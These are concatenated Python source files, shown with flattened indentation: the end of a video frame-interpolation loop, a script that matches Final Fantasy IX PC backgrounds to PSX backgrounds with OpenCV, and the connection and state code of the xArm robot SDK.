if sim_workers > 1:
time.sleep(thread_ram/8)
while len(active_workers) >= sim_workers:
finished_workers = []
alive_workers = []
for worker in active_workers:
if not worker.is_alive():
finished_workers.append(worker)
else:
alive_workers.append(worker)
active_workers = list(alive_workers)
time.sleep(0.01)
last_thread_time = time.time()
# mid = (((ICurrent[0]).cpu().detach().numpy().transpose(1, 2, 0)))
# write_buffer.put((output_frame_num, mid[:h, :w]))
pbar_dup.update(1)
output_frame_num += 1
ratio += rstep
write_buffer.put((output_frame_num, current_frame))
IPrevious = ICurrent
output_frame_num += 1
dframes = 0
# wait for all active worker threads left to finish
for p in active_workers:
p.join()
# send write loop exit code
write_buffer.put((-1, -1))
# it should put IOThreadsFlag to False it return
while(IOThreadsFlag):
time.sleep(0.01)
pbar.close() # type: ignore
pbar_dup.close()
for p in IOProcesses:
p.join(timeout=8)
for p in IOProcesses:
p.terminate()
p.join(timeout=0)
import hashlib
lockfile = os.path.join('locks', hashlib.sha1(output_folder.encode()).hexdigest().upper() + '.lock')
if os.path.isfile(lockfile):
os.remove(lockfile)
# input("Press Enter to continue...")
sys.exit(0)
|
1-match_pc_psx.py
|
import os
import glob
import cv2
import shutil
import json
from multiprocessing import Process, Pool, Manager
import numpy as np
dir_path = os.path.dirname(os.path.realpath(__file__))
# Number of threads to use
NUM_THREADS = 12
# directory where the TIFF files for the PC background are located.
PC_FOLDER = os.path.join(dir_path, "PC_Extracted_Fields_Background")
# directory where the TIFF files for the PSX background are located.
PSX_FOLDER = os.path.join(dir_path, "PSX_Extracted_Fields_Background")
PSX_INFO_LIST = sorted(glob.glob(PSX_FOLDER+"\\CD_*\\*.info"))
PC_INFO_LIST = sorted(glob.glob(PC_FOLDER+"\\*.info"))
pc_infos = dict()
file_matching = dict()
FileCheck = False
def extract_pc_infos(pc_info):
tmp_pc_infos = dict()
with open(pc_info) as f:
tile_PC = int(f.readline())
info_PC = f.readlines()
if not tile_PC in tmp_pc_infos:
tmp_pc_infos[tile_PC] = dict()
for i in range(0, len(info_PC)):
layer = dict()
infos_layer = info_PC[i].strip().split(" ")
layer_blend = int(infos_layer[7])
layer_number = infos_layer[0]
layer_camera = int(infos_layer[1])
layer["layer_number"] = int(layer_number)
layer["layer_id"] = int(infos_layer[2])
layer["camera_id"] = int(layer_camera)
layer["blend"] = int(layer_blend)
layer["tile_amount"] = int(infos_layer[3])
layer["distance"] = int(infos_layer[4])
layer["has_parallax"] = int(infos_layer[5])
layer["is_static"] = int(infos_layer[6])
layer["is_attached"] = int(infos_layer[8])
layer["is_first_of_anim"] = int(infos_layer[9])
layer["is_looping"] = int(infos_layer[10])
if not layer_camera in tmp_pc_infos[tile_PC]:
tmp_pc_infos[tile_PC][layer_camera] = dict()
tmp_pc_infos[tile_PC][layer_camera]["layers"] =[]
img_PC_source = pc_info.replace(".info", "")
tmp_pc_infos[tile_PC][layer_camera]["img"] = img_PC_source
img_pc = cv2.imread(filename = img_PC_source, flags = cv2.IMREAD_UNCHANGED )
tmp_pc_infos[tile_PC][layer_camera]["width"] = img_pc.shape[0]
tmp_pc_infos[tile_PC][layer_camera]["height"] = img_pc.shape[1]
tmp_pc_infos[tile_PC][layer_camera]["size"] = os.path.getsize(img_PC_source)
tmp_pc_infos[tile_PC][layer_camera]["layers"].append(layer)
return tmp_pc_infos
def match_PC_PSX(pc_info_files):
for info_file in pc_info_files:
pass
def check_duplicate(img_duplicates):
key, value = img_duplicates
dups = {}
if len(value["duplicate"]) != 0 :
tile_PC = value["field"]
debug = False
if value["img"] == r"D:\FFIX_HD_MOD\PC_Extracted_Fields_Background\PC_16_4.tiff":
print("Debug", value["img"])
debug = True
# we are reading all the layers
ret, layers_PC = cv2.imreadmulti(filename = value["img"], flags = cv2.IMREAD_UNCHANGED )
for dup in value["duplicate"]:
# And all the layers of potential duplicates
sameFile = True
ret, layers_dup_PC = cv2.imreadmulti(filename = dup, flags = cv2.IMREAD_UNCHANGED )
# for some reasons, black images are messing with cv2....
if len(layers_PC) == 1:
layer_r, layer_g, layer_b, layer_a = cv2.split(layers_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
sameFile = False
layer_r, layer_g, layer_b, layer_a = cv2.split(layers_dup_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
sameFile = False
if sameFile == True:
for i in range(0, len(layers_PC)):
difference = cv2.subtract(layers_PC[i], layers_dup_PC[i])
r, g, b, a = cv2.split(difference)
# If layer A - layer B = 0, there is absolutely no difference in that layer.
# If there is a difference, it's not the same file, no need to check further !
if cv2.countNonZero(b) != 0 or cv2.countNonZero(g) != 0 or cv2.countNonZero(r) != 0:
sameFile = False
break
if sameFile == True:
if not value["img"] in dups :
dups[value["img"]] = []
dups[value["img"]].append(dup)
else :
# we know that this layer is not the same than our key, but it can be identical to any other layer !
# We do the same test - Should be a function to avoid duplicating code, but I'm lazy.
# Feel free to make it nicer :)
for other_dup in value["duplicate"]:
if other_dup != dup and other_dup not in dups.keys():
for current_dups in dups :
if other_dup in dups[current_dups]:
continue
other_sameFile = True
ret, other_layer_dup_PC = cv2.imreadmulti(filename = other_dup, flags = cv2.IMREAD_UNCHANGED )
if len(other_layer_dup_PC) == 1:
layer_r, layer_g, layer_b, layer_a = cv2.split(other_layer_dup_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
other_sameFile = False
layer_r, layer_g, layer_b, layer_a = cv2.split(layers_dup_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
other_sameFile = False
if other_sameFile == True:
for i in range(0, len(layers_dup_PC)):
difference = cv2.subtract(layers_dup_PC[i], other_layer_dup_PC[i])
b, g, r, a = cv2.split(difference)
if cv2.countNonZero(b) != 0 or cv2.countNonZero(g) != 0 or cv2.countNonZero(r) != 0:
other_sameFile = False
break
if other_sameFile == True:
if not dup in dups :
dups[dup] = []
dups[dup].append(other_dup)
return dups
def check_duplicate_main(orig_info_list, save_json):
pool = Pool(NUM_THREADS)
pc_infos = dict()
tmp_result = pool.map(extract_pc_infos, orig_info_list)
for result in tmp_result:
for tile_PC in result:
if not tile_PC in pc_infos:
pc_infos[tile_PC] = result[tile_PC]
else:
for camera in result[tile_PC]:
if not camera in pc_infos[tile_PC]:
pc_infos[tile_PC][camera] = result[tile_PC][camera]
else:
pass
# search for duplicate fields.
i = 0
img_duplicates = dict()
# Simple check here : If the size are equal, and they have the same layers, we can assume the files are the same.
for tile_PC in pc_infos:
tile_info = pc_infos[tile_PC]
for camera in tile_info:
camera_info = tile_info[camera]
img = camera_info["img"]
size_img = camera_info["size"]
width, height = (camera_info["width"], camera_info["height"])
key = ("%i_%i_%i_%i" %(size_img, width, height, len(camera_info["layers"])))
if not key in img_duplicates:
img_duplicates[key] = dict()
img_duplicates[key]["field"] = tile_PC
img_duplicates[key]["img"] = img
img_duplicates[key]["duplicate"] = []
else:
img_duplicates[key]["duplicate"].append(img)
i = i + 1
with open("Unique_Fields_PC_Unfiltered.json", "w") as write_file:
json.dump(pc_infos, write_file, indent=4)
print("Before filtering", len(pc_infos))
# More complicated check
dups = pool.map(check_duplicate, img_duplicates.items())
with open("Duplicated_PC_Images.json", "w") as write_file:
json.dump(dups, write_file, indent=4)
for dup in dups:
if len(dup) != 0:
for original in dup:
duplicates = dup[original]
for duplicate in duplicates:
tilesToDelete = []
for tile_PC in pc_infos:
camerasToDelete = []
tile_info = pc_infos[tile_PC]
for camera in tile_info:
camera_info = tile_info[camera]
if duplicate == camera_info["img"] :
camerasToDelete.append(camera)
for cameraToDelete in camerasToDelete:
if pc_infos[tile_PC].pop(cameraToDelete, None) == None:
print("Error")
else:
if len(pc_infos[tile_PC]) == 0:
tilesToDelete.append(tile_PC)
for tileToDelete in tilesToDelete:
if pc_infos.pop(tileToDelete, None) == None:
print("Error")
print("After filtering", len(pc_infos))
with open(save_json, "w") as write_file:
json.dump(pc_infos, write_file, indent=4)
return pc_infos
def match_psx_pc(fields, pc_infos, psx_infos, return_dict):
for field in fields:
field_info = pc_infos[field]
cam_result = dict()
if len(field_info) == 0:
print("No camera for field", field)
for camera in field_info:
camera_info = field_info[camera]
layers = camera_info["layers"]
img_pc = camera_info["img"]
num_layers = len(layers)
potential_matchs = []
num_no_text_layers = 0
for layer in layers:
if layer["is_static"] and layer["distance"] < 5:
break
# special case, manual correction.
if field == "1201" and layer["layer_number"] == 26:
break
num_no_text_layers = num_no_text_layers + 1
for psx_field in psx_infos:
psx_field_info = psx_infos[psx_field]
if not camera in psx_field_info:
continue
psx_camera_info = psx_field_info[camera]
psx_layers = psx_camera_info["layers"]
img_psx = psx_camera_info["img"]
psx_num_layers = len(psx_layers)
if psx_num_layers < num_no_text_layers:
# not worth investigating this.
continue
num_match = 0
for psx_layer in psx_layers:
for layer in layers:
if layer["is_static"] and layer["distance"] < 5:
continue
if (
psx_layer["layer_id"] == layer["layer_id"] and
psx_layer["camera_id"] == layer["camera_id"] and
psx_layer["blend"] == layer["blend"] and
psx_layer["tile_amount"] == layer["tile_amount"] and
psx_layer["distance"] == layer["distance"] and
psx_layer["has_parallax"] == layer["has_parallax"] and
psx_layer["is_static"] == layer["is_static"] and
psx_layer["is_attached"] == layer["is_attached"] and
psx_layer["is_first_of_anim"] == layer["is_first_of_anim"] and
psx_layer["is_looping"] == layer["is_looping"]
) :
num_match = num_match + 1
if num_match >= num_no_text_layers:
potential_matchs.append(psx_field)
if len(potential_matchs) == 0:
print("No match found for", img_pc, "camera", camera )
if len(potential_matchs) > 1:
if(os.path.exists(img_pc) == False):
print("Path", img_pc, "is not found")
ret, layers_PC = cv2.imreadmulti(filename = img_pc, flags = cv2.IMREAD_UNCHANGED )
betterField = - 1
minMean = 10000000000000000000
for potential_field in potential_matchs:
meanImg = 0
if(os.path.exists(psx_infos[potential_field][camera]["img"]) == False):
print("Path", psx_infos[potential_field][camera]["img"], "is not found")
ret, layers_PSX = cv2.imreadmulti(filename = psx_infos[potential_field][camera]["img"], flags = cv2.IMREAD_UNCHANGED )
for i in range(0, len(layers_PC)):
layer_psx = cv2.resize(layers_PSX[i], (0,0), fx=2.0, fy=2.0, interpolation = cv2.INTER_NEAREST)
difference = cv2.subtract(layers_PC[i], layer_psx)
meanDiff = cv2.mean(difference)
meanImg = meanImg +( meanDiff[0] + meanDiff[1] + meanDiff[2])
if(meanImg < minMean):
betterField = potential_field
minMean = meanImg
potential_matchs.clear()
potential_matchs=[betterField]
cam_result[camera] = potential_matchs[0]
return_dict[field] = cam_result
def chunks(l, n):
n = max(1, n)
return (l[i:i+n] for i in range(0, len(l), n))
if __name__ == '__main__':
if os.path.exists("Unique_Fields_PC.json") == False:
pc_infos = check_duplicate_main(PC_INFO_LIST, "Unique_Fields_PC.json")
else:
with open("Unique_Fields_PC.json", "r") as read_file:
pc_infos = json.load(read_file)
if os.path.exists("Unique_Fields_PSX.json") == False:
psx_infos = check_duplicate_main(PSX_INFO_LIST, "Unique_Fields_PSX.json")
else:
with open("Unique_Fields_PSX.json", "r") as read_file:
psx_infos = json.load(read_file)
#now, we are trying match PC with PSX images !
fields_list = list(pc_infos.keys())
split = np.array_split(fields_list, NUM_THREADS)
manager = Manager()
return_dict = manager.dict()
processes = []
for fields in split:
p = Process(target=match_psx_pc, args=(fields, pc_infos, psx_infos, return_dict))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
# save all the infos in the json matching file.
with open("match_PC_PSX.json", "w") as write_file:
json.dump(return_dict.copy(), write_file, indent=4)
|
base.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2020, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
import re
import time
import math
import threading
from .events import Events
from ..core.config.x_config import XCONF
from ..core.comm import SerialPort, SocketPort
from ..core.wrapper import UxbusCmdSer, UxbusCmdTcp
from ..core.utils.log import logger, pretty_print
from ..core.utils import convert
from ..core.config.x_code import ControllerWarn, ControllerError, ControllerErrorCodeMap, ControllerWarnCodeMap
from .utils import xarm_is_connected, compare_time, compare_version, xarm_is_not_simulation_mode
from .code import APIState
controller_error_keys = ControllerErrorCodeMap.keys()
controller_warn_keys = ControllerWarnCodeMap.keys()
class Base(Events):
def __init__(self, port=None, is_radian=False, do_not_open=False, **kwargs):
if kwargs.get('init', False):
super(Base, self).__init__()
self._port = port
self._debug = kwargs.get('debug', False)
self._baudrate = kwargs.get('baudrate', XCONF.SerialConf.SERIAL_BAUD)
self._timeout = kwargs.get('timeout', None)
self._filters = kwargs.get('filters', None)
self._enable_heartbeat = kwargs.get('enable_heartbeat', False)
self._enable_report = kwargs.get('enable_report', True)
self._report_type = kwargs.get('report_type', 'rich')
self._check_tcp_limit = kwargs.get('check_tcp_limit', False)
self._check_joint_limit = kwargs.get('check_joint_limit', True)
self._check_cmdnum_limit = kwargs.get('check_cmdnum_limit', True)
self._check_simulation_mode = kwargs.get('check_simulation_mode', True)
self._max_cmd_num = kwargs.get('max_cmdnum', 512)
if not isinstance(self._max_cmd_num, int):
self._max_cmd_num = 512
self._max_cmd_num = min(XCONF.MAX_CMD_NUM, self._max_cmd_num)
self._check_robot_sn = kwargs.get('check_robot_sn', False)
self._check_is_ready = kwargs.get('check_is_ready', True)
self._check_is_pause = kwargs.get('check_is_pause', True)
self._timed_comm = kwargs.get('timed_comm', True)
self._timed_comm_interval = kwargs.get('timed_comm_interval', 180)
self._timed_comm_t = None
self._timed_comm_t_alive = False
self._min_tcp_speed, self._max_tcp_speed = 0.1, 1000 # mm/s
self._min_tcp_acc, self._max_tcp_acc = 1.0, 50000 # mm/s^2
self._tcp_jerk = 1000 # mm/s^3
self._min_joint_speed, self._max_joint_speed = 0.01, 4.0 # rad/s
self._min_joint_acc, self._max_joint_acc = 0.01, 20.0 # rad/s^2
self._joint_jerk = 20.0 # rad/s^3
self._rot_jerk = 2.3
self._max_rot_acc = 2.7
self._stream_type = 'serial'
self._stream = None
self.arm_cmd = None
self._stream_report = None
self._report_thread = None
self._only_report_err_warn_changed = True
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0] # 力矩
self._tcp_load = [0, [0, 0, 0]] # 负载[重量, 重心], [weight, [x, y, z]]
self._collision_sensitivity = 0 # 碰撞灵敏度
self._teach_sensitivity = 0 # 示教灵敏度
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_type = XCONF.Robot.Type.XARM7_X4
self._arm_axis = XCONF.Robot.Axis.XARM7
axis = kwargs.get('axis', self._arm_axis)
if axis in [5, 6, 7]:
self._arm_axis = axis
arm_type = kwargs.get('type', self._arm_type)
if arm_type in [3, 5, 6, 7, 8]:
self._arm_type = arm_type
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._default_is_radian = is_radian
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0 # 固件主版本号
self._minor_version_number = 0 # 固件次版本号
self._revision_version_number = 0 # 固件修正版本号
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._cond_pause = threading.Condition()
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]]
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
if not do_not_open:
self.connect()
def _init(self):
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0] # 力矩
self._tcp_load = [0, [0, 0, 0]] # 负载[重量, 重心], [weight, [x, y, z]]
self._collision_sensitivity = 0 # 碰撞灵敏度
self._teach_sensitivity = 0 # 示教灵敏度
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0 # 固件主版本号
self._minor_version_number = 0 # 固件次版本号
self._revision_version_number = 0 # 固件修正版本号
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._cond_pause = threading.Condition()
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
@staticmethod
def log_api_info(msg, *args, code=0, **kwargs):
if code == 0:
logger.info(msg, *args, **kwargs)
else:
logger.error(msg, *args, **kwargs)
def _check_version(self, is_first=False):
if is_first:
self._version = None
self._robot_sn = None
try:
if not self._version:
self.get_version()
if is_first:
count = 2
while not self._version and count:
self.get_version()
time.sleep(0.1)
count -= 1
if self._version and isinstance(self._version, str):
pattern = re.compile(
r'.*[vV](\d+)\.(\d+)\.(\d+),[vV](\d+)\.(\d+)\.(\d+),[vV](\d+)\.(\d+)\.(\d+),(\d+),(\d+)')
m = re.match(pattern, self._version)
if m:
(arg1, arg2, arg3, arg4, arg5, arg6,
self._major_version_number,
self._minor_version_number,
self._revision_version_number,
arg10, arg11) = map(int, m.groups())
pass
else:
pattern = re.compile(r'.*[vV](\d+)\.(\d+)\.(\d+)')
m = re.match(pattern, self._version)
if m:
(self._major_version_number,
self._minor_version_number,
self._revision_version_number) = map(int, m.groups())
else:
version_date = '-'.join(self._version.split('-')[-3:])
self._is_old_protocol = compare_time('2019-02-01', version_date)
if self._is_old_protocol:
self._major_version_number = 0
self._minor_version_number = 0
self._revision_version_number = 1
else:
self._major_version_number = 0
self._minor_version_number = 1
self._revision_version_number = 0
if is_first:
if self._check_robot_sn:
count = 2
while not self._robot_sn and count and self.warn_code == 0:
self.get_robot_sn()
self.get_err_warn_code()
if not self._robot_sn and self.warn_code == 0 and count:
time.sleep(0.1)
count -= 1
if self.warn_code != 0:
self.clean_warn()
print('is_old_protocol: {}'.format(self._is_old_protocol))
print('version_number: {}.{}.{}'.format(self._major_version_number, self._minor_version_number,
self._revision_version_number))
except Exception as e:
print('compare_time: {}, {}'.format(self._version, e))
@property
def version_is_ge_1_5_20(self):
if self._version is None:
self._check_version()
return self._major_version_number > 1 or (
self._major_version_number == 1 and self._minor_version_number > 5) or (
self._major_version_number == 1 and self._minor_version_number == 5 and self._revision_version_number >= 20)
@property
def version_is_ge_1_2_11(self):
if self._version is None:
self._check_version()
return self._major_version_number > 1 or (
self._major_version_number == 1 and self._minor_version_number > 2) or (
self._major_version_number == 1 and self._minor_version_number == 2 and self._revision_version_number >= 11)
@property
def realtime_tcp_speed(self):
return self._realtime_tcp_speed
@property
def realtime_joint_speeds(self):
return [speed if self._default_is_radian else math.degrees(speed) for speed in self._realtime_joint_speeds]
@property
def version_number(self):
return self._major_version_number, self._minor_version_number, self._revision_version_number
@property
def connected(self):
return self._stream and self._stream.connected
@property
def ready(self):
return self._is_ready
@property
def default_is_radian(self):
return self._default_is_radian
@property
def is_simulation_robot(self):
return self._is_simulation_robot
def check_is_simulation_robot(self):
return self._check_simulation_mode and self.is_simulation_robot
# return self._check_simulation_mode and self.mode != 4
@property
def version(self):
if not self._version:
self.get_version()
return self._version
# return 'v' + '.'.join(map(str, self.version_number))
@property
def sn(self):
return self._robot_sn
@property
def position(self):
if not self._enable_report:
self.get_position()
return [math.degrees(self._position[i]) if 2 < i < 6 and not self._default_is_radian
else self._position[i] for i in range(len(self._position))]
@property
def tcp_jerk(self):
return self._tcp_jerk
@property
def tcp_speed_limit(self):
return [self._min_tcp_speed, self._max_tcp_speed]
@property
def tcp_acc_limit(self):
return [self._min_tcp_acc, self._max_tcp_acc]
@property
def last_used_position(self):
return [math.degrees(self._last_position[i]) if 2 < i < 6 and not self._default_is_radian
else self._last_position[i] for i in range(len(self._last_position))]
@property
def last_used_tcp_speed(self):
return self._last_tcp_speed
@property
def last_used_tcp_acc(self):
return self._last_tcp_acc
@property
def angles(self):
if not self._enable_report:
self.get_servo_angle()
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._angles]
@property
def joint_jerk(self):
return self._joint_jerk if self._default_is_radian else math.degrees(self._joint_jerk)
@property
def joint_speed_limit(self):
limit = [self._min_joint_speed, self._max_joint_speed]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def joint_acc_limit(self):
limit = [self._min_joint_acc, self._max_joint_acc]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def last_used_angles(self):
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._last_angles]
@property
def last_used_joint_speed(self):
return self._last_joint_speed if self._default_is_radian else math.degrees(self._last_joint_speed)
@property
def last_used_joint_acc(self):
return self._last_joint_acc if self._default_is_radian else math.degrees(self._last_joint_acc)
@property
def position_offset(self):
return [math.degrees(self._position_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._position_offset[i] for i in range(len(self._position_offset))]
@property
def world_offset(self):
return [math.degrees(self._world_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._world_offset[i] for i in range(len(self._world_offset))]
@property
def state(self):
if not self._enable_report:
self.get_state()
return self._state
@property
def mode(self):
return self._mode
@property
def joints_torque(self):
return self._joints_torque
@property
def tcp_load(self):
return self._tcp_load
@property
def collision_sensitivity(self):
return self._collision_sensitivity
@property
def teach_sensitivity(self):
return self._teach_sensitivity
@property
def motor_brake_states(self):
return self._arm_motor_brake_states
@property
def motor_enable_states(self):
return self._arm_motor_enable_states
@property
def temperatures(self):
return self._temperatures
@property
def error_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._error_code
@property
def warn_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._warn_code
@property
def has_error(self):
return self.error_code != 0
@property
def has_warn(self):
return self.warn_code != 0
@property
def has_err_warn(self):
return self.has_error or self._warn_code != 0 or (self.arm_cmd and self.arm_cmd.has_err_warn)
@property
def cmd_num(self):
if not self._enable_report:
self.get_cmdnum()
return self._cmd_num
@property
def device_type(self):
return self._arm_type
@property
def axis(self):
return self._arm_axis
@property
def master_id(self):
return self._arm_master_id
@property
def slave_id(self):
return self._arm_slave_id
@property
def motor_tid(self):
return self._arm_motor_tid
@property
def motor_fid(self):
return self._arm_motor_fid
@property
def gravity_direction(self):
return self._gravity_direction
@property
def gpio_reset_config(self):
return [self._cgpio_reset_enable, self._tgpio_reset_enable]
@property
def count(self):
return self._count
@property
def servo_codes(self):
return self._servo_codes
@property
def is_stop(self):
return self.state in [4, 5]
@property
def voltages(self):
return self._voltages
@property
def currents(self):
return self._currents
@property
def cgpio_states(self):
return self._cgpio_states
@property
def self_collision_params(self):
return [self._is_collision_detection, self._collision_tool_type, self._collision_tool_params]
def check_is_pause(self):
if self._check_is_pause:
if self.state == 3 and self._enable_report:
with self._cond_pause:
self._cond_pause.wait()
@property
def state_is_ready(self):
if self._check_is_ready and not self.version_is_ge_1_5_20:
return self.ready
else:
return True
def _timed_comm_thread(self):
self._timed_comm_t_alive = True
while self.connected and self._timed_comm_t_alive:
try:
self.get_cmdnum()
except:
pass
count = self._timed_comm_interval * 10
while count > 0:
count -= 1
time.sleep(0.1)
if not self._timed_comm_t_alive or not self.connected:
break
def connect(self, port=None, baudrate=None, timeout=None, axis=None, arm_type=None):
if self.connected:
return
if axis in [5, 6, 7]:
self._arm_axis = axis
if arm_type in [3, 5, 6, 7]:
self._arm_type = arm_type
self._is_ready = True
self._port = port if port is not None else self._port
self._baudrate = baudrate if baudrate is not None else self._baudrate
self._timeout = timeout if timeout is not None else self._timeout
if not self._port:
raise Exception('can not connect to port/ip {}'.format(self._port))
if self._timed_comm_t is not None:
try:
self._timed_comm_t_alive = False
self._timed_comm_t.join()
self._timed_comm_t = None
except:
pass
self._is_first_report = True
self._first_report_over = False
self._init()
if isinstance(self._port, (str, bytes)):
if self._port == 'localhost' or re.match(
r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$",
self._port):
self._stream = SocketPort(self._port, XCONF.SocketConf.TCP_CONTROL_PORT,
heartbeat=self._enable_heartbeat,
buffer_size=XCONF.SocketConf.TCP_CONTROL_BUF_SIZE)
if not self.connected:
raise Exception('connect socket failed')
try:
if self._timed_comm:
self._timed_comm_t = threading.Thread(target=self._timed_comm_thread, daemon=True)
self._timed_comm_t.start()
except:
pass
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdTcp(self._stream)
self._stream_type = 'socket'
self._stream_report = None
try:
self._connect_report()
except:
self._stream_report = None
self._check_version(is_first=True)
self.arm_cmd.set_debug(self._debug)
if self._stream.connected and self._enable_report:
if self._is_old_protocol:
self._report_thread = threading.Thread(target=self._report_thread_handle_old, daemon=True)
else:
self._report_thread = threading.Thread(target=self._report_thread_handle, daemon=True)
self._report_thread.start()
self._report_connect_changed_callback()
else:
self._stream = SerialPort(self._port)
if not self.connected:
raise Exception('connect serail failed')
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdSer(self._stream)
self._stream_type = 'serial'
if self._enable_report:
self._report_thread = threading.Thread(target=self._auto_get_report_thread, daemon=True)
self._report_thread.start()
self._report_connect_changed_callback(True, True)
else:
self._report_connect_changed_callback(True, False)
self._check_version(is_first=True)
